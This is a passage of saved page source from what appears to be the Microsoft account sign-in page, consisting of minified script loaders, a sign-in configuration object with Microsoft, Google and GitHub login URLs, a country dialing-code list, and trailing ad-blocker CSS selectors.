s=a.length,v=0;v<s;v++)f.push(a[v]);n.apply(t,f)}catch(h){return void(c&&c.submitFromException&&c.submitFromException(h))}}var u=n.r&&n.r[r];return t=t?t:this,u&&(u.skipTimeout?a():o.setTimeout(a,0)),u}function e(r,t){return Array.prototype.slice.call(r,t?1:0)}var o=window;o.$Do||(o.$Do={q:[],r:[],removeItems:[],lock:0,o:[]});var n=o.$Do;n.when=function(e,o){function i(r){t(r,a,u)||n.q.push({id:r,c:a,a:u})}var a=0,u=[],c=1,f="function"==typeof o;f||(a=o,c=2);for(var s=c;s<arguments.length;s++)u.push(arguments[s]);e instanceof Array?r(e,i):i(e)},n.register=function(r,e,o){if(!n.r[r]){n.o.push(r);var i={};if(e&&(i.method=e),o&&(i.skipTimeout=o),arguments&&arguments.length>3){i.extraArgs=[];for(var a=3;a<arguments.length;a++)i.extraArgs.push(arguments[a])}n.r[r]=i,n.lock++;try{for(var u=0;u<n.q.length;u++){var c=n.q[u];c.id==r&&t(r,c.c,c.a)&&n.removeItems.push(c)}}catch(f){throw f}finally{if(n.lock--,0===n.lock){for(var s=0;s<n.removeItems.length;s++)for(var v=n.removeItems[s],h=0;h<n.q.length;h++)if(n.q[h]===v){n.q.splice(h,1);break}n.removeItems=[]}}}},n.unregister=function(r){n.r[r]&&delete n.r[r]}}()}]));</script><script type="text/javascript">!function(e,n){for(var r in n)e[r]=n[r]}(this,function(e){function n(t){if(r[t])return r[t].exports;var o=r[t]={exports:{},id:t,loaded:!1};return e[t].call(o.exports,o,o.exports,n),o.loaded=!0,o.exports}var r={};return n.m=e,n.c=r,n.p="",n(0)}([function(e,n){!function(){function e(){return r.$Config||r.ServerData||{}}function n(){var n=(e(),new i),r=this,a=[],f=[],u=[];r.Add=function(e,r,t,o){a.push(e),n.Add(e,r,t,o)},r.Provides=function(e){if(e)if(e instanceof Array)for(var n=0;n<e.length;n++)f.push(e[n]);else f.push(e)},r.Requires=function(e){if(e)if(e instanceof Array)for(var n=0;n<e.length;n++)u.push(e[n]);else u.push(e)},r.Load=function(e,r){var i=function(){e&&e();for(var n=0;n<f.length;n++)o.register(f[n],0,!0)},s=function(){n.Load(i,r)};if(u.length>0){for(var c=t.getElementsByTagName("head")[0],d=0;d<a.length;d++){var h=t.createElement("link");h.rel="prefetch",h.href=a[d],c.appendChild(h)}o.when(u,s)}else s()}}var r=window,t=r.document,o=r.$Do,i=r.$Loader,a=".css";a.length;n.WhenLoaded=function(e,n){o.when(e,n)},r.$DepLoader=n}()}]));</script><link rel="shortcut icon" href="https://logincdn.msauth.net/16.000.28230.00/images/favicon.ico"><link rel="stylesheet" title="Converged_v2" type="text/css" crossorigin="anonymous" integrity="sha384-2riFcYS2C8P9crfoIpylJIWi9uD876mOldrLPoi+O1Xd8FoAlcPQEGt+jhUkdSHz" onload="$Loader.OnSuccess(this)" onerror="$Loader.OnError(this)" href="https://logincdn.msauth.net/16.000.28230.00/Converged_v21033.css"><style type="text/css"></style><style type="text/css">body{display:none;}</style><script type="text/javascript">if (top != self){try{top.location.replace(self.location.href);}catch (e){}}else{document.write(unescape('%3C%73') + 'tyle type="text/css">body{display:block !important;}</style>');}</script><style type="text/css">body{display:block !important;}</style><noscript><style type="text/css">body{display:block !important;}</style></noscript><script type="text/javascript">!function(e,r){for(var t in r)e[t]=r[t]}(this,function(e){function r(n){if(t[n])return t[n].exports;var i=t[n]={exports:{},id:n,loaded:!1};return e[n].call(i.exports,i,i.exports,r),i.loaded=!0,i.exports}var t={};return r.m=e,r.c=t,r.p="",r(0)}([function(e,r){var t=window,n=t.navigator;t.g_iSRSFailed=0,t.g_sSRSSuccess="",r.SRSRetry=function(e,r,i,s,a){var o=1,c=unescape("%3Cscript type='text/javascript'");a&&(c+=" crossorigin='anonymous' integrity='"+a+"'"),c+=" src='";var u=unescape("'%3E%3C/script%3E"),S=r;if(n&&n.userAgent&&s&&s!==r){var d=n.userAgent.toLowerCase(),p=d.indexOf("edge")>=0;if(!p){var f=d.match(/chrome\/([0-9]+)\./),g=f&&2===f.length&&!isNaN(f[1])&&parseInt(f[1])>54;g&&(S=s)}}t.g_sSRSSuccess.indexOf(e)===-1&&("undefined"==typeof t[e]?(t.g_iSRSFailed=1,i<=o&&document.write(c+S+u)):t.g_sSRSSuccess+=e+"|"+i+",")}}]));var g_dtFirstByte=new Date();var g_objPageMode = null;</script><link rel="image_src" href="https://logincdn.msauth.net/16.000.28230.00/images/Windows_Live_v_thumb.jpg"><script type="text/javascript">var ServerData = {CH:'sign up',Bj:'https://account.live.com/query.aspx?uaid=e52f753aa5184927ab11e578045c61f0&mkt=EN-US&lc=1033&id=38936',CI:'',CL:'PPFT',Bn:'',CM:'',CN:'',Bo:'https://login.live.com/gls.srf?urlID=WinLiveTermsOfUse&mkt=EN-US&vv=1600&uaid=e52f753aa5184927ab11e578045c61f0',Bp:'https://login.live.com/GetCredentialType.srf?opid=571D1438BD1E1543&vv=1600&mkt=EN-US&lc=1033&uaid=e52f753aa5184927ab11e578045c61f0',CO:'',CP:'',Bq:'https://login.live.com/Me.htm?v=1&uaid=e52f753aa5184927ab11e578045c61f0',Br:'',CQ:"#~#partnerdomain#~# does\'t use this service. Please sign in with a Microsoft account or create a new account. <a href=\"#~#WLPaneHelpInviteBlockedURL_LS#~#\" id=\"idPaneHelpInviteBlockedLink9\">Learn More</a>",Bs:'',Bt:'https://login.live.com/GetSessionState.srf?vv=1600&mkt=EN-US&lc=1033&uaid=e52f753aa5184927ab11e578045c61f0',CT:"A single-use code lets you sign in without entering your password. This helps protect your account when you\'re using someone else\'s PC. <a href=\"http://explore.live.com/windows-live-sign-in-single-use-code-faq\" id=\"idPaneHelpOTCInfoLink9\" target=\"_blank\">Learn more</a>",CU:"Your session has timed out. To request a single use code, please <a href=\"javascript:NewOTCRequest()\">refresh the page</a>.",Bx:0,CW:"Sign in",aL:false,Bz:true,aM:true,aN:true,aO:false,aS:true,urlLogin:'https://login.live.com/login.srf?contextid=6568703AD42C7BD2&bk=1560565059&mkt=EN-US&lc=1033&uaid=e52f753aa5184927ab11e578045c61f0',b3:0,b4:0,aU:0,aW:5,hpgid:33,Cd:{},Ce:{},Cf:'',Ch:'##li16####B##Hotmail##/B####BR##The smart way to do email - fast, easy and reliable##li8####B##Messenger##/B####BR##Stay in touch with the most important people in your life##li10####B##SkyDrive##/B####BR##Free, password-protected online storage',Ci:'',Cj:'',urlFed:'',Co:'Passp',ac:true,ad:true,Cp:'',Cq:"&copy;2020 Microsoft",Cr:'',ag:true,bG:false,Cu:"Use the primary phone number you\'ve associated with your Microsoft account. <a href=\"http://explore.live.com/windows-live-sign-in-single-use-code-faq\" id=\"idPaneHelpOTCInfoLink9\" target=\"_blank\">Learn more</a>",sPOST_NewUser:'',bH:false,bK:true,an:true,bO:true,urlPost:'https://login.live.com/ppsecure/?contextid=6568703AD42C7BD2&bk=1560565059&uaid=e52f753aa5184927ab11e578045c61f0&pid=0',bV:true,ax:0,bW:false,az:3,A:10000,fWebNgcFS:false,B:0,C:{},D:1,sFedQS:'wa=wsignin1.0&wtrealm=uri:WindowsLiveID&wctx=contextid%3D6568703AD42C7BD2%26bk%3D1560565059',ba:false,H:'https://signup.live.com/signup?contextid=6568703AD42C7BD2&bk=1560565059&ru=https://login.live.com/login.srf%3fcontextid%3d6568703AD42C7BD2%26mkt%3dEN-US%26lc%3d1033%26bk%3d1560565059%26uaid%3de52f753aa5184927ab11e578045c61f0&uiflavor=web&mkt=EN-US&lc=1033&uaid=e52f753aa5184927ab11e578045c61f0',cA:'',bc:false,J:'',bd:true,cC:'',A0:false,A1:true,cD:'https://go.microsoft.com/fwlink/?LinkID=254486',K:-1,cF:'',M:1033,A3:true,bh:false,N:'https://login.live.com/cookiesDisabled?uaid=e52f753aa5184927ab11e578045c61f0&mkt=EN-US&lc=1033',bj:true,str:[],bk:true,A8:false,R:0,S:60,bn:false,U:'',X:false,Z:3,bt:false,urlSwitch:'https://login.live.com/logout.srf?contextid=6568703AD42C7BD2&uaid=e52f753aa5184927ab11e578045c61f0&ru=https://account.live.com%3fmkt%3dEN-US%26lc%3d1033%26id%3d38936&bk=1560565059&lm=I',AB:'AF~Afghanistan~93!!!AL~Albania~355!!!DZ~Algeria~213!!!AD~Andorra~376!!!AO~Angola~244!!!AQ~Antarctica~672!!!AG~Antigua and Barbuda~1!!!AR~Argentina~54!!!AM~Armenia~374!!!AW~Aruba~297!!!AC~Ascension Island~247!!!AU~Australia~61!!!AT~Austria~43!!!AZ~Azerbaijan~994!!!BS~Bahamas~1!!!BH~Bahrain~973!!!BD~Bangladesh~880!!!BB~Barbados~1!!!BY~Belarus~375!!!BE~Belgium~32!!!BZ~Belize~501!!!BJ~Benin~229!!!BM~Bermuda~1!!!BT~Bhutan~975!!!BO~Bolivia~591!!!BQ~Bonaire~599!!!BA~Bosnia and Herzegovina~387!!!BW~Botswana~267!!!BV~Bouvet Island~47!!!BR~Brazil~55!!!IO~British Indian Ocean Territory~44!!!VG~British Virgin Islands~1!!!BN~Brunei~673!!!BG~Bulgaria~359!!!BF~Burkina Faso~226!!!BI~Burundi~257!!!CV~Cabo Verde~238!!!KH~Cambodia~855!!!CM~Cameroon~237!!!CA~Canada~1!!!KY~Cayman Islands~1!!!CF~Central African Republic~236!!!TD~Chad~235!!!CL~Chile~56!!!CN~China~86!!!CX~Christmas Island~61!!!CC~Cocos (Keeling) Islands~61!!!CO~Colombia~57!!!KM~Comoros~269!!!CG~Congo~242!!!CD~Congo (DRC)~243!!!CK~Cook Islands~682!!!CR~Costa Rica~506!!!CI~Côte d\'Ivoire~225!!!HR~Croatia~385!!!CU~Cuba~53!!!CW~Curaçao~599!!!CY~Cyprus~357!!!CZ~Czechia~420!!!DK~Denmark~45!!!DJ~Djibouti~253!!!DM~Dominica~1!!!DO~Dominican Republic~1!!!EC~Ecuador~593!!!EG~Egypt~20!!!SV~El Salvador~503!!!GQ~Equatorial Guinea~240!!!ER~Eritrea~291!!!EE~Estonia~372!!!ET~Ethiopia~251!!!FK~Falkland Islands~500!!!FO~Faroe Islands~298!!!FJ~Fiji~679!!!FI~Finland~358!!!FR~France~33!!!GF~French Guiana~594!!!PF~French Polynesia~689!!!GA~Gabon~241!!!GM~Gambia~220!!!GE~Georgia~995!!!DE~Germany~49!!!GH~Ghana~233!!!GI~Gibraltar~350!!!GR~Greece~30!!!GL~Greenland~299!!!GD~Grenada~1!!!GP~Guadeloupe~590!!!GU~Guam~1!!!GT~Guatemala~502!!!GG~Guernsey~44!!!GN~Guinea~224!!!GW~Guinea-Bissau~245!!!GY~Guyana~592!!!HT~Haiti~509!!!HN~Honduras~504!!!HK~Hong Kong SAR~852!!!HU~Hungary~36!!!IS~Iceland~354!!!IN~India~91!!!ID~Indonesia~62!!!IR~Iran~98!!!IQ~Iraq~964!!!IE~Ireland~353!!!IM~Isle of Man~44!!!IL~Israel~972!!!IT~Italy~39!!!JM~Jamaica~1!!!XJ~Jan Mayen~47!!!JP~Japan~81!!!JE~Jersey~44!!!JO~Jordan~962!!!KZ~Kazakhstan~7!!!KE~Kenya~254!!!KI~Kiribati~686!!!KR~Korea~82!!!XK~Kosovo~383!!!KW~Kuwait~965!!!KG~Kyrgyzstan~996!!!LA~Laos~856!!!LV~Latvia~371!!!LB~Lebanon~961!!!LS~Lesotho~266!!!LR~Liberia~231!!!LY~Libya~218!!!LI~Liechtenstein~423!!!LT~Lithuania~370!!!LU~Luxembourg~352!!!MO~Macao SAR~853!!!MK~North Macedonia~389!!!MG~Madagascar~261!!!MW~Malawi~265!!!MY~Malaysia~60!!!MV~Maldives~960!!!ML~Mali~223!!!MT~Malta~356!!!MH~Marshall Islands~692!!!MQ~Martinique~596!!!MR~Mauritania~222!!!MU~Mauritius~230!!!YT~Mayotte~262!!!MX~Mexico~52!!!FM~Micronesia~691!!!MD~Moldova~373!!!MC~Monaco~377!!!MN~Mongolia~976!!!ME~Montenegro~382!!!MS~Montserrat~1!!!MA~Morocco~212!!!MZ~Mozambique~258!!!MM~Myanmar~95!!!NA~Namibia~264!!!NR~Nauru~674!!!NP~Nepal~977!!!NL~Netherlands~31!!!AN~Netherlands Antilles (Former)~599!!!NC~New Caledonia~687!!!NZ~New Zealand~64!!!NI~Nicaragua~505!!!NE~Niger~227!!!NG~Nigeria~234!!!NU~Niue~683!!!KP~North Korea~850!!!MP~Northern Mariana Islands~1!!!NO~Norway~47!!!OM~Oman~968!!!PK~Pakistan~92!!!PW~Palau~680!!!PS~Palestinian Authority~970!!!PA~Panama~507!!!PG~Papua New Guinea~675!!!PY~Paraguay~595!!!PE~Peru~51!!!PH~Philippines~63!!!PL~Poland~48!!!PT~Portugal~351!!!QA~Qatar~974!!!RE~Réunion~262!!!RO~Romania~40!!!RU~Russia~7!!!RW~Rwanda~250!!!XS~Saba~599!!!KN~Saint Kitts and Nevis~1!!!LC~Saint Lucia~1!!!PM~Saint Pierre and Miquelon~508!!!VC~Saint Vincent and the Grenadines~1!!!WS~Samoa~685!!!SM~San Marino~378!!!ST~São Tomé and Príncipe~239!!!SA~Saudi Arabia~966!!!SN~Senegal~221!!!RS~Serbia~381!!!SC~Seychelles~248!!!SL~Sierra Leone~232!!!SG~Singapore~65!!!XE~Sint Eustatius~599!!!SK~Slovakia~421!!!SI~Slovenia~386!!!SB~Solomon Islands~677!!!SO~Somalia~252!!!ZA~South Africa~27!!!SS~South Sudan~211!!!ES~Spain~34!!!LK~Sri Lanka~94!!!SH~St Helena, Ascension, and Tristan da Cunha~290!!!SD~Sudan~249!!!SR~Suriname~597!!!SJ~Svalbard~47!!!SZ~Swaziland~268!!!SE~Sweden~46!!!CH~Switzerland~41!!!SY~Syria~963!!!TW~Taiwan~886!!!TJ~Tajikistan~992!!!TZ~Tanzania~255!!!TH~Thailand~66!!!TL~Timor-Leste~670!!!TG~Togo~228!!!TK~Tokelau~690!!!TO~Tonga~676!!!TT~Trinidad and Tobago~1!!!TA~Tristan da Cunha~290!!!TN~Tunisia~216!!!TR~Turkey~90!!!TM~Turkmenistan~993!!!TC~Turks and Caicos Islands~1!!!TV~Tuvalu~688!!!UM~U.S. Outlying Islands~1!!!VI~U.S. Virgin Islands~1!!!UG~Uganda~256!!!UA~Ukraine~380!!!AE~United Arab Emirates~971!!!UK~United Kingdom~44!!!US~United States~1!!!UY~Uruguay~598!!!UZ~Uzbekistan~998!!!VU~Vanuatu~678!!!VA~Vatican City~379!!!VE~Venezuela~58!!!VN~Vietnam~84!!!WF~Wallis and Futuna~681!!!YE~Yemen~967!!!ZM~Zambia~260!!!ZW~Zimbabwe~263',AC:'',urlFedConvertRename:'https://account.live.com/security/LoginStage.aspx?lmif=1000&ru=https://login.live.com/login.srf%3Fvv%3D1600%26mkt%3DEN-US%26lc%3D1033%26uaid%3De52f753aa5184927ab11e578045c61f0&vv=1600&mkt=EN-US&lc=1033&cbid=0&id=38936&uaid=e52f753aa5184927ab11e578045c61f0',AD:'https://accounts.google.com/o/oauth2/v2/auth?response_type=code&client_id=1057459215779-l3uvdm899ucea09atcc09d9rq6uvkilv.apps.googleusercontent.com&scope=openid+profile+email&redirect_uri=https://login.live.com/HandleGoogleResponse.srf&access_type=offline&state=571D1438BD1E1543',by:false,a:'https://logincdn.msauth.net/16.000.28230.00/',AG:false,b:'',d:false,e:'',AK:true,f:true,g:'',AM:0,h:false,ca:'',i:'e52f753aa5184927ab11e578045c61f0',cc:'',AP:'',B0:true,AR:'',l:0,m:'https://github.com/login/oauth/authorize?response_type=code&client_id=e37ffdec11c0245cb2e0&scope=read:user++user:email&redirect_uri=https://login.live.com/HandleGithubResponse.srf&allow_signup=false&state=571D1438BD1E1543',AS:'',n:'https://account.live.com/ResetPassword.aspx?wreply=https://login.live.com/login.srf%3fcontextid%3d6568703AD42C7BD2%26bk%3d1560565059&id=38936&uiflavor=web&uaid=e52f753aa5184927ab11e578045c61f0&mkt=EN-US&lc=1033&bk=1560565059',B3:false,AT:'',B4:false,sCBUpTxt1:'',p:true,sCBUpTxt2:'',r:1,t:'contextid=6568703AD42C7BD2&bk=1560565059',B9:false,v:false,w:false,correlationId:'e52f753aa5184927ab11e578045c61f0',oPost:{},z:null,Ab:'',BA:'',Ad:'https://account.live.com/username/recover?wreply=https://login.live.com/login.srf%3flc%3d1033%26mkt%3dEN-US%26contextid%3d6568703AD42C7BD2%26bk%3d1560565059%26uaid%3de52f753aa5184927ab11e578045c61f0&id=38936&mkt=EN-US&lc=1033&uaid=e52f753aa5184927ab11e578045c61f0&uiflavor=web',Ae:'',BE:'',BF:'',Ag:true,BG:'',Aj:false,BK:'',Al:true,sErrTxt:'',An:0,Ao:0,BN:'https://login.live.com/gls.srf?urlID=MSNPrivacyStatement&mkt=EN-US&vv=1600&uaid=e52f753aa5184927ab11e578045c61f0',Ap:'login.live.com',Aq:'',html:[],iPawnIcon:1,C0:'',sFTTag:'<input type="hidden" name="PPFT" id="i0327" value="DcdEdJaHB!R1wYVBzDEj!SK!1gdRziXv0q4A4OKtStH8DOvDdEkfgNCpunOAsRkpAsNR9FmFayvNxxCoS873UGIK!GCkpS*FnmVeyr1Je6ytW*jedfciXEQoJyl6qpYYgShx1oO7WR33YBqXFa7jmpF*nhQoNQUBSpHbiInbdTUmh!SEChv50D4a14gCHFOOrz02JnZAZa0yroPfrebc9nsFXJLZ4vMstBCU7IIKO!x9MhosB!iM!fuSl7uJ39uWsA$$"/>',C1:'https://sc.imp.live.com/content/dam/imp/surfaces/mail_signin/v3/account/EN-US.html?id=38936&mkt=EN-US',C2:'',loader:{cdnRoots:['https://logincdn.msauth.net/','https://lgincdnvzeuno.azureedge.net','https://lgincdnmsftuswe2.azureedge.net']},C3:'',Au:'',C4:'',C5:'',Aw:[],C6:'',BW:2,C7:'',BX:true,Az:true,BY:true,fHasBackgroundColor:false,urlStaySignIn:'https://login.live.com/login.srf?contextid=6568703AD42C7BD2&mkt=EN-US&lc=1033&bk=1560565059&uaid=e52f753aa5184927ab11e578045c61f0',a3:null,CA:1,a5:'',a7:'',Bd:'16.0.28230.0',CD:{},Be:'',CE:{'Logo':'','LogoAltText':'','LogoText':'','ShowWLHeader':true},Bf:'',Bg:''};</script><script type="text/javascript">window.UXResourceDependencies = [];</script><script type="text/javascript">(function () {var l = new window.$DepLoader();l.Add("https://logincdn.msauth.net/16.000.28230.00/ConvergedLoginPaginatedStrings.en","ConvergedLoginPaginatedStrings","sha384-xVDraNdONqTyl+0QHyTkQ4Egoc1QeoPrkvmHeYNo2GR60TcJCFqLlG16dkA1WHDu");l.Provides("UX_JS_Strings");var res = ("UX_Res_" + window.UXResourceDependencies.length);l.Provides(res);window.UXResourceDependencies.push(res);l.Load();}());</script><script type="text/javascript" src="https://logincdn.msauth.net/16.000.28230.00/ConvergedLoginPaginatedStrings.en" id="ConvergedLoginPaginatedStrings" crossorigin="anonymous" integrity="sha384-xVDraNdONqTyl+0QHyTkQ4Egoc1QeoPrkvmHeYNo2GR60TcJCFqLlG16dkA1WHDu"></script><script type="text/javascript">(function () {var l = new window.$DepLoader();l.Add("https://logincdn.msauth.net/16.000.28230.00/ConvergedLogin_PCore","ConvergedLogin_PCore","sha384-W3tLe4XyGn7647DwKgS7rCCpX1e6CNbyyP57PfLoQ12xQCpHWhHf5rmgJRN7WJR8");l.Requires("UX_JS_Strings");l.Provides("UX_JS_Core");var res = ("UX_Res_" + window.UXResourceDependencies.length);l.Provides(res);window.UXResourceDependencies.push(res);l.Load();}());</script><link rel="prefetch" href="https://logincdn.msauth.net/16.000.28230.00/ConvergedLogin_PCore"><script type="text/javascript">window.WhenAllLoaded = function (callback) { window.$DepLoader.WhenLoaded(window.UXResourceDependencies, callback); };</script><script type="text/javascript" src="https://logincdn.msauth.net/16.000.28230.00/ConvergedLogin_PCore" id="ConvergedLogin_PCore" crossorigin="anonymous" integrity="sha384-W3tLe4XyGn7647DwKgS7rCCpX1e6CNbyyP57PfLoQ12xQCpHWhHf5rmgJRN7WJR8"></script><style type="text/css">:root div[aria-label="MessageAdsContainer"], :root div[class^="__Microsoft_Owa_MessageListAds_"], :root .GKJYXHBF2 > .GKJYXHBE2 > .GKJYXHBH5, :root a[href*="mfroute.com/"], :root a[href^="http://ffxitrack.com/"], :root a[href^="http://ad-apac.doubleclick.net/"], :root a[href^="http://www.amazon.co.uk/exec/obidos/external-search?"], :root #\5f _mom_ad_2, :root #rhs_block .mod > .luhb-div > div[data-async-type="updateHotelBookingModule"], :root #\5f _admvnlb_modal_container, :root #MAIN.ShowTopic > .ad, :root a[href^="https://www.arthrozene.com/"][href*="?tid="], :root a[href^="http://pubads.g.doubleclick.net/"], :root .GB3L-QEDGY .GB3L-QEDF- > .GB3L-QEDE-, :root #main_col > #center_col div[style="font-size:14px;margin:0 4px;padding:1px 5px;background:#fff7ed"], :root div[class*="-storyBodyAd-"], :root #center_col > #main > .dfrd > .mnr-c > .c._oc._zs, :root a[href^="http://ul.to/ref/"], :root #\5f _nq__hh[style="display:block!important"], :root a[href^="http://cdn.adstract.com/"], :root a[href^="//tracking.content-recommendation.net/"][href*="/sponsored/click.html?"], :root div[class^="ads-partner-"], :root #\5f _mom_ad_12, :root a[href^="http://lp.ncdownloader.com/"], :root a[href^="https://fileboom.me/pr/"], :root .inlineNewsletterSubscription + .inlineNewsletterSubscription div[class$="_item"], :root .commercial-unit-desktop-rhs > .iKidV > .Ee92ae + .P2mpm + .hp3sk, :root a[href^="//4c7og3qcob.com/"], :root a[href^="http://join3.bannedsextapes.com/track/"], :root div[id^="google_ads_iframe_"], :root #ads > .dose > .dosesingle, :root a[href^="http://3wr110.net/"], :root a[href^="http://bestorican.com/"], :root div[id^="ad_script_"], :root a[href^="http://get.slickvpn.com/"], :root .gbfwa > div[class$="_item"], :root #assetsListings[style="display: block;"], :root #center_col > #\5f Emc, :root a[href^="http://marketgid.com"], :root #rhs_block > ol > .rhsvw > .kp-blk > .xpdopen > ._OKe > ol > ._DJe > .luhb-div, :root AD-SLOT, :root a[href^="http://go.mobisla.com/"], :root a[href^="http://bodelen.com/"], :root a[href^="http://www.webtrackerplus.com/"], :root #center_col > #res > #topstuff + #search > div > #ires > #rso > #flun, :root a[href^="https://watchmygirlfriend.tv/"], :root a[href^="http://www.affbuzzads.com/affiliate/"], :root #center_col > #resultStats + #tads, :root #main-content > [style="padding:10px 0 0 0 !important;"], :root #center_col > #resultStats + #tads + #res + #tads, :root #cnt #center_col > #taw > #tvcap > .c._oc._Lp, :root a[onmousedown^="this.href='http://staffpicks.outbrain.com/network/redir?"][target="_blank"], :root #center_col > #resultStats + div + #res + #tads, :root div[id^="crt-"][style], :root div[class^="Ad__container"], :root a[href^="http://centertrust.xyz/"], :root a[href^="http://g1.v.fwmrm.net/ad/"], :root a[href^="http://www.fbooksluts.com/"], :root #center_col > #resultStats + div[style="border:1px solid #dedede;margin-bottom:11px;padding:5px 7px 5px 6px"], :root a[href^="http://ads.integral-marketing.com/"], :root #resultspanel > #topads, :root a[href^="https://www.firstload.com/affiliate/"], :root a[href^="https://control.trafficfabrik.com/"], :root #center_col > #taw > #tvcap > .commercial-unit-desktop-top, :root a[href^="http://t.mdn2015x1.com/"], :root div[id^="advads_"], :root a[data-obtrack^="http://paid.outbrain.com/network/redir?"], :root .__y_inner > .__y_item, :root div[id^="ads300_100-widget"], :root #center_col > #taw > #tvcap > .rscontainer, :root .commercial-unit-mobile-top .jackpot-main-content-container > .UpgKEd + .nZZLFc > .vci, :root #center_col > div[style="font-size:14px;margin-right:0;min-height:5px"] > div[style="font-size:14px;margin:0 4px;padding:1px 5px;background:#fff8e7"], :root div[id^="MarketGid"], :root a[href^="https://www.financeads.net/tc.php?"], :root #cnt #center_col > #res > #topstuff > .ts, :root a[href^="https://aaucwbe.com/"], :root a[href^="http://espn.zlbu.net/"], :root a[href^="https://ads.trafficpoizon.com/"], :root #content > #center > .dose > .dosesingle, :root #content > #right > .dose > .dosesingle, :root #flowplayer > div[style="position: absolute; width: 300px; height: 275px; left: 222.5px; top: 85px; z-index: 999;"], :root a[href^="http://ads.betfair.com/redirect.aspx?"], :root #flowplayer > div[style="z-index: 208; position: absolute; width: 300px; height: 275px; left: 222.5px; top: 85px;"], :root a[href*="emprestimo.eu"], :root #header + #content > #left > #rlblock_left, :root a[href^="http://9amq5z4y1y.com/"], :root a[href^="https://traffic.bannerator.com/"], :root .__zinit .__y_item, :root a[href^="//40ceexln7929.com/"], :root #mbEnd[cellspacing="0"][cellpadding="0"], :root a[href^="http://banners.victor.com/processing/"], :root #mn #center_col > div > h2.spon:first-child, :root .ch[onclick="ga(this,event)"], :root a[href^="//go.vedohd.org/"], :root #mn #center_col > div > h2.spon:first-child + ol:last-child, :root a[href^="http://affiliate.coral.co.uk/processing/"], :root div[id^="yandex_ad"], :root #mn div[style="position:relative"] > #center_col > ._Ak, :root a[href*=".clksite.com/"], :root #mn div[style="position:relative"] > #center_col > div > ._dPg, :root .__yinit .__y_item, :root a[href^="http://finaljuyu.com/"], :root div[id^="mainads"], :root #rhs_block > .ts[cellspacing="0"][cellpadding="0"][style="padding:0"], :root #rhs_block > #mbEnd, :root a[href^="http://traffic.tc-clicks.com/"], :root #rhs_block .mod > .gws-local-hotels__booking-module, :root #rhs_block .xpdopen > ._OKe > div > .mod > ._yYf, :root a[href^="http://data.ad.yieldmanager.net/"], :root #rhs_block > script + .c._oc._Ve.rhsvw, :root a[data-redirect^="https://paid.outbrain.com/network/redir?"], :root a[href*="deliver.trafficfabrik.com"], :root a[href^="http://track.adform.net/"], :root #tads + div + .c, :root #rhswrapper > #rhssection[border="0"][bgcolor="#ffffff"], :root a[href^="http://admingame.info/"], :root #ssmiwdiv[jsdisplay], :root a[href^="http://www.dealcent.com/register.php?affid="], :root #topstuff > #tads, :root .GFYY1SVD2 > .GFYY1SVC2 > .GFYY1SVF5, :root a[href^="http://www.linkbucks.com/referral/"], :root .GHOFUQ5BG2 > .GHOFUQ5BF2 > .GHOFUQ5BG5, :root .GFYY1SVE2 > .GFYY1SVD2 > .GFYY1SVG5, :root a[href^="https://ad.atdmt.com/"], :root .jobs-information-call-to-action + .jobs-information-call-to-action div[class$="_item"], :root .__ywvr .__y_item, :root a[href^="//00ae8b5a9c1d597.com/"], :root a[href^="http://www.terraclicks.com/"], :root a[href*=".qertewrt.com/"], :root .GJJKPX2N1 > .GJJKPX2M1 > .GJJKPX2P4, :root a[href^="http://s5prou7ulr.com/"], :root .GPMV2XEDA2 > .GPMV2XEDP1 > .GPMV2XEDJBB, :root a[href^="http://4c7og3qcob.com/"], :root a[href^="http://aff.ironsocket.com/"], :root .Mpopup + #Mad > #MadZone, :root aside[itemtype="https://schema.org/WPAdBlock"], :root .__y_elastic .__y_item, :root a[href^="http://www.adxpansion.com"], :root a[href^="http://trk.mdrtrck.com/"], :root .__ywl .__y_item, :root .l-container > #fishtank, :root a[href^="https://a.adtng.com/"], :root .icons-rss-feed + .icons-rss-feed div[class$="_item"], :root a[href^="http://dethao.com/"], :root .lads[width="100%"][style="background:#FFF8DD"], :root iframe[src^="http://cdn2.adexprt.com/"], :root a[href^="https://retiremely.com/"], :root .mod > ._jH + .rscontainer, :root .mw > #rcnt > #center_col > #taw > #tvcap > .c, :root a[href^="http://clicks.binarypromos.com/"], :root .mw > #rcnt > #center_col > #taw > .c, :root .nrelate .nr_partner, :root a[href^="http://tezfiles.com/pr/"], :root [lazy-ad="leftbottom_banner"], :root .ob_container .item-container-obpd, :root a[href^="http://partner.sbaffiliates.com/"], :root a[href^="http://www.firstload.com/affiliate/"], :root a[href^="http://www.myfreepaysite.com/sfw_int.php?aid"], :root a[href^="//srv.buysellads.com/"], :root a[href^="http://click.payserve.com/"], :root a[href^="http://pwrads.net/"], :root .ob_dual_right > .ob_ads_header ~ .odb_div, :root .plistaList > .itemLinkPET, :root a[href^="http://www.download-provider.org/"], :root a[href^="//88d7b6aa44fb8eb.com/"], :root .plistaList > .plista_widget_underArticle_item[data-type="pet"], :root a[href^="http://www.pinkvisualgames.com/?revid="], :root .plista_widget_belowArticleRelaunch_item[data-type="pet"], :root .ra[align="left"][width="30%"], :root a[href^="http://ads.affbuzzads.com/"], :root a[href^="http://promos.bwin.com/"], :root a[href^="http://tracker.mybroadband.co.za/"], :root .ra[align="right"][width="30%"], :root a[href^="http://bs.serving-sys.com/"], :root a[href^="http://api.content.ad/"], :root a[href^="https://www.googleadservices.com/pagead/aclk?"], :root .ra[width="30%"][align="right"] + table[width="70%"][cellpadding="0"], :root a[href^="http://n217adserv.com/"], :root .rc-cta[data-target], :root .rhsvw[style="background-color:#fff;margin:0 0 14px;padding-bottom:1px;padding-top:1px;"], :root a[href^="https://land.rk.com/landing/"], :root .rscontainer > .ellip, :root a[href^="http://refpaano.host/"], :root .widget-pane-section-result[data-result-ad-type], :root a[href^="http://adserver.adtechus.com/"], :root .section-result[data-result-ad-type], :root .trc_rbox .syndicatedItem, :root .trc_rbox_border_elm .syndicatedItem, :root a[href^="http://taboola-"][href*="/redirect.php?app.type="], :root a[href^="https://topoffers.com/"][href*="/?pid="], :root .trc_rbox_div .syndicatedItem, :root .trc_rbox_div .syndicatedItemUB, :root div[id^="div_openx_ad_"], :root .trc_rbox_div a[target="_blank"][href^="http://tab"], :root a[href*=".irtyc.com/"], :root a[href^="//porngames.adult/?SID="], :root a[href^="http://engine.newsmaxfeednetwork.com/"], :root a[href^="https://www.camsoda.com/enter.php?id="], :root a[href*="=exoclick"], :root a[href^="//zenhppyad.com/"], :root a[href^="http://ddownload39.club/"], :root .trc_related_container div[data-item-syndicated="true"], :root .vi-lb-placeholder[title="ADVERTISEMENT"], :root a[href^="http://landingpagegenius.com/"], :root a[href^="//api.ad-goi.com/"], :root 